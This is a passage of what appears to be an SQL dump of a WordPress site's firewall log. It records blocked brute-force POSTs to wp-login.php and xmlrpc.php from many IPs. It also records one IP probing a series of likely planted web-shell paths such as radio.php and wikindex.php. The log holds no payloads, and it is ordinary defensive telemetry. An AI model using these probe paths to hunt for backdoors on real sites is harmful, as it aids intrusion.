Safari\\/537.36\"}','ImQuyTWe9rdwK053qaiEg6jc',0,1665146370.9297,2348,'','POST',403,0,515,0,1,'',0),('213.152.161.219',3583549915,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','zVUEuPf4FxaH3KhtlekOrQsg',0,1665146294.4785,1262,'','POST',403,0,515,0,1,'',0),('184.75.223.211',3091980243,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','x4PpwydaDEGkoLtv1qbO5Mhe',0,1665146209.8670,19070,'','POST',403,0,515,0,1,'',0),('3.110.180.235',57586923,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','vpYeHZzb6WhAJTD5ROQ8NMPo',0,1665145514.4339,535,'','POST',403,0,600,0,1,'',0),('134.209.105.240',2261871088,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','bydqVznjYxDrI6JHEQ3Lu9U5',0,1665144870.2835,456,'','POST',403,0,600,0,1,'',0),('184.75.221.195',3091979715,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','O5kE10Hyiuo3r8wgJfPeLWcm',0,1665145122.8632,2829,'','POST',403,0,515,0,1,'',0),('216.158.230.167',3634292391,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Ztvh6obfMqiwQljI45uNCEyP',0,1665151046.8569,19214,'','POST',403,0,515,0,1,'',0),('51.91.83.187',861623227,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','LtShAXGoz2cgJmQCuyneP1Oi',0,1665150515.2219,18485,'','POST',403,0,515,0,1,'',0),('13.76.135.117',223119221,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','p8mYiUzPo9473vXukySOWEec',0,1665149994.8537,18977,'','POST',403,0,515,0,1,'',0),('103.171.180.165',1739306149,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ux80v2hR9KNQFHcGblM4rDiE',0,1665149461.2225,19045,'','POST',403,0,515,0,1,'',0),('178.128.85.69',2994754885,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','DbGNkgtiBvKcMmWuaZhoye20',0,1665148547.7166,19814,'','POST',403,0,515,0,1,'',0),('15.235.168.187',267102395,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','oB82MhwIkd0cqRbgFZauTz9L',0,1665148046.7613,18404,'','POST',403,0,515,0,1,'',0),('61.12.67.132',1024213892,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','d0em2RDYMrlFpbEOHntWXVSJ',0,1665155790.8033,20524,'','POST',403,0,515,0,1,'',0),('15.235.168.187',267102395,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','s6kRKIBPJVZc0E2xC3hbuSdm',0,1665154736.0751,17346,'','POST',403,0,515,0,1,'',0),('81.88.52.223',1364735199,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8xNSmDhGolbie0gVvrX1M62F',0,1665154201.0662,1754,'','POST',403,0,515,0,1,'',0),('185.200.116.203',3116922059,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','n1sDLIzC4oxY8ASBdbErZjGl',0,1665154044.2112,2058,'','POST',403,0,515,0,1,'',0),('162.241.115.107',2733732715,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','brAV3K1YLh8WyUEw6OQHBjmZ',0,1665153666.5441,12797,'','POST',403,0,515,0,1,'',0),('198.136.54.132',3330815620,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HgwA9ZPdM3vGIEDcKBbyWYep',0,1665152608.5990,18257,'','POST',403,0,515,0,1,'',0),('82.165.184.76',1386592332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','CfTzp5iuYZd39tbXl7G86jAM',0,1665152099.5043,18748,'','POST',403,0,515,0,1,'',0),('119.18.52.177',1997681841,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','a9qlGcbN4uLWxYv2hoP5QiO6',0,1665151567.3559,18260,'','POST',403,0,515,0,1,'',0),('104.254.90.251',1761499899,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','gX7aroIO4wt6H1J92ZSFWKhj',0,1665156844.7321,18555,'','POST',403,0,515,0,1,'',0),('37.120.155.179',628661171,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','vnjsgt8E62H7rG1MWmzI9aBd',0,1665161435.2125,18963,'','POST',403,0,515,0,1,'',0),('178.162.204.238',2997013742,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','OETxsBXNo7zVJYDlAh4StfQ5',0,1665161164.6288,18012,'','POST',403,0,515,0,1,'',0),('213.152.186.173',3583556269,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','4qjU8OpfuTF0VoxlserithIm',0,1665161042.1646,8210,'','POST',403,0,515,0,1,'',0),('161.35.126.102',2703457894,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\"}','I5yE1cgeaJVFTlQrNSUWpLwu',0,1665160840.0651,18920,'','POST',403,0,600,0,1,'',0),('185.156.174.27',3114053147,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','W21rBZoAmqwj6bIUp0THXVFL',0,1665160199.6205,10851,'','POST',403,0,515,0,1,'',0),('145.239.30.120',2448367224,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','hnQ5HrXCEAY7P9UOfKBZgu4c',0,1665159165.2022,17919,'','POST',403,0,600,0,1,'',0),('54.67.66.32',910377504,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','E1gz7p95WfcMhujKYVRGHvLb',0,1665164168.5567,1534,'','POST',403,0,600,0,1,'',0),('184.75.223.219',3091980251,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','csEAvHMalb5yPQD9uzTt630N',0,1665164065.0438,2275,'','POST',403,0,515,0,1,'',0),('103.130.218.189',1736628925,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','6kqshi3d4gxM0VIBm7eQtALD',0,1665162507.0947,17654,'','POST',403,0,600,0,1,'',0),('185.190.142.217',3116273369,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','N6TiHPMwQthOWzJUlboCIxpu',0,1665169070.2026,18073,'','POST',403,0,600,0,1,'',0),('185.3.164.156',3104023708,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','ZhSq97PbHMv0yC1gTUKisx6Y',0,1665167453.8391,1229,'','POST',403,0,600,0,1,'',0),('213.152.162.170',3583550122,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','VPftJLX8EjiKUn91yGB24dep',0,1665165957.9503,10335,'','POST',403,0,515,0,1,'',0),('198.244.167.101',3337922405,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','pESIslFUPcu6CjHMxwa9h2bJ',0,1665165812.0525,17967,'','POST',403,0,600,0,1,'',0),('123.25.21.16',2065241360,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/59.0.3071.115 Safari\\/537.36\"}','AKGm8gkzOyZVcdvRW2Hlb7N3',0,1665172264.7863,17881,'','POST',403,0,600,0,1,'',0),('167.71.63.47',2806464303,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','6mNIcOksP4nEgb9Uqx3h7Sfr',0,1665170674.9246,17462,'','POST',403,0,600,0,1,'',0),('62.102.148.156',1046910108,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','RbnZWIAx8K10gXDMwBt5YrNo',0,1665169305.0485,2437,'','POST',403,0,515,0,1,'',0),('39.108.148.88',661427288,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','I6DaMGxAqYt72vikpFBV5Z0U',0,1665175495.1674,18089,'','POST',403,0,600,0,1,'',0),('207.154.250.8',3483040264,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','r7IFY3UgDo8GqXSNhRZCc60n',0,1665173872.0461,1228,'','POST',403,0,600,0,1,'',0),('51.178.138.5',867338757,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','rLWmNsiVw65SjDk4cMYPZdIU',0,1665177121.7136,17859,'','POST',403,0,600,0,1,'',0),('146.56.99.136',2453169032,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','H5tWSzmo2sL8iaF7vZOp3TCN',0,1665182017.8003,17745,'','POST',403,0,600,0,1,'',0),('106.52.120.186',1781823674,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','ijnxthcXSHgBlUP4mRasY2O0',0,1665180383.5433,17469,'','POST',403,0,600,0,1,'',0),('213.152.162.165',3583550117,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ngLUzJ5TtfuaQblkX739sF4C',0,1665195389.8661,2373,'','POST',403,0,515,0,1,'',0),('137.184.117.52',2310567220,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','20VWTONI6wkzKmfPj9HRAeaF',0,1665195372.9463,18771,'','POST',403,0,600,0,1,'',0),('141.98.101.133',2372035973,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','KLrnth0a6UgR4JSFCzlPbmEx',0,1665193794.0472,3225,'','POST',403,0,515,0,1,'',0),('138.68.90.29',2319735325,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','bUTtApiDnFc63mReSHk4lEXB',0,1665193691.3282,17249,'','POST',403,0,600,0,1,'',0),('64.42.179.59',1076540219,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','fQ4BnoWYh1XmkUjzwONMJa35',0,1665193123.0645,18490,'','POST',403,0,515,0,1,'',0),('213.152.161.249',3583549945,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','eF2aXBZPrWTtv4LcnEmpgs1A',0,1665192750.9583,19026,'','POST',403,0,515,0,1,'',0),('143.244.177.220',2415178204,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','z4QqPYmaXcivyshSK5wIrpNn',0,1665192006.9467,17577,'','POST',403,0,600,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/wp-content/plugins/core-engine/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','i5ILzX4uZy2d6OrVgocW3CHG',0,1665191343.9821,315,'','POST',403,0,700,0,1,'',0),('45.55.44.23',758590487,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','FqvbZ6MEKStdk4xipOaRsUoD',0,1665187001.9184,16600,'','POST',403,0,600,0,1,'',0),('13.81.59.92',223427420,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','zZC6dWubr0gQaoFTAy781eI2',0,1665185336.0257,18138,'','POST',403,0,600,0,1,'',0),('185.156.175.60',3114053436,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','sLMJZhGxT9SIicFvm7fARNrb',0,1665184026.3567,18548,'','POST',403,0,515,0,1,'',0),('95.217.129.44',1608089900,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','tmIS5TyFPzJ9aAb0GN7cK4Uh',0,1665183670.0973,17828,'','POST',403,0,600,0,1,'',0),('152.228.208.88',2565132376,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','FlRZ8Oca1QuGBzvIf0nP6Ntj',0,1665190336.6466,1331,'','POST',403,0,600,0,1,'',0),('124.153.66.86',2090418774,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','9k0qdHzgltNsahBy3Vj2no85',0,1665188672.2383,17429,'','POST',403,0,600,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/wp-content/plugins/core-engine/admin.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','eQJ2qG3c7ExVm6f4Zrd5HRgj',0,1665191342.7477,305,'','GET',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/wp-admin/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','GbXlxRBIWN38TUF5OZ6qCE9Q',0,1665191341.5834,306,'','POST',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/wp-admin/wikindex.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','1rmRn3WXvJG940HoSP6yiekE',0,1665191340.4484,330,'','GET',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/wp-includes/rest-api/endpoints/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','LM2O1coIeKy8gErQSWlYNsBR',0,1665191339.3334,277,'','POST',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/wp-includes/rest-api/endpoints/radio.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','RnTF3M1PSQX8x0DkGoa7yCEK',0,1665191338.2427,332,'','GET',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/wp-content/themes/classic/inc/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','0OA6HG7V2XQhMcvsDomuFeJN',0,1665191337.0505,284,'','POST',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/wp-content/themes/classic/inc/admin.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','V0Degmy4ab7A6RCUx8vKFJHW',0,1665191335.9541,295,'','GET',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/wp-admin/css/colors/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','s57Tmrz1PI8hqBM4Caw9XJtS',0,1665191334.8452,333,'','POST',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/wp-admin/css/colors/radio.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','85ECrSmtvzPBoa6V1LjMnwbc',0,1665191333.7634,300,'','GET',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/wp-admin/js/widgets/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','76x4a10wQNmctWn9AfgJuiYT',0,1665191332.4306,448,'','POST',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/wp-admin/js/widgets/radio.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','RpKl3cDYh79t2MPsbkAzBGQU',0,1665191330.9770,498,'','GET',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','4gD359dYXOKC2AiIZeQlVf08',0,1665191329.6665,427,'','POST',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/radio.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','0hmiv3KRsdAnUQzrqJV1lTZ5',0,1665191328.4196,315,'','GET',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','kVzrtIDlboOhxus8eCA27WYJ',0,1665191327.3206,292,'','POST',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/about.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','MNP1oOriAQ42u6hGBYFU8dxR',0,1665191325.9560,561,'','GET',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/css/votes.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','nOJrajcieYRNFmKAZbUvMlzG',0,1665191324.8518,339,'','POST',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/css/votes.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','7AXinY8NbxyKDoM4chGsrmgV',0,1665191323.6512,317,'','GET',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','iNuEvUIPo8g1k725nAVYhD3O',0,1665191322.5043,333,'','POST',403,0,515,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/xmlrpc.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Uop9TwiIPxnlVqY16XLgRmMC',0,1665191321.4193,286,'','GET',403,0,515,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','yrt5cdl17OkYf94GZTeiUq3Q',0,1665191320.3320,333,'','POST',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/wikindex.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','0wmpraAlvUy7SoLY6J5nPziK',0,1665191319.1480,340,'','GET',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','6KivwNEdLYZRlgB4jpuMtcOn',0,1665191318.0076,357,'','POST',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/admin.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','MU1hvHLmkXIA7Pg6iZzJ83w2',0,1665191316.8366,339,'','GET',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','TiP9ykSHrNlwsm4xeUfhY62Z',0,1665191315.7064,321,'','POST',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/load.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','IwQN9BJFLMOKh8ElAygZzbf5',0,1665191314.5978,299,'','GET',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Dn7uaIJV4ZpgjsNMf5Eo3iq9',0,1665191313.5018,295,'','POST',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','TOjVFa1IW5niGC03fE6xegm9',0,1665191312.2881,349,'','GET',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','m8lBv1nPXzYu4DtNrKeF7hMO',0,1665191311.1581,289,'','POST',403,0,700,0,1,'',0),('5.188.29.168',96214440,'','https://cteisys.com/1index.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) 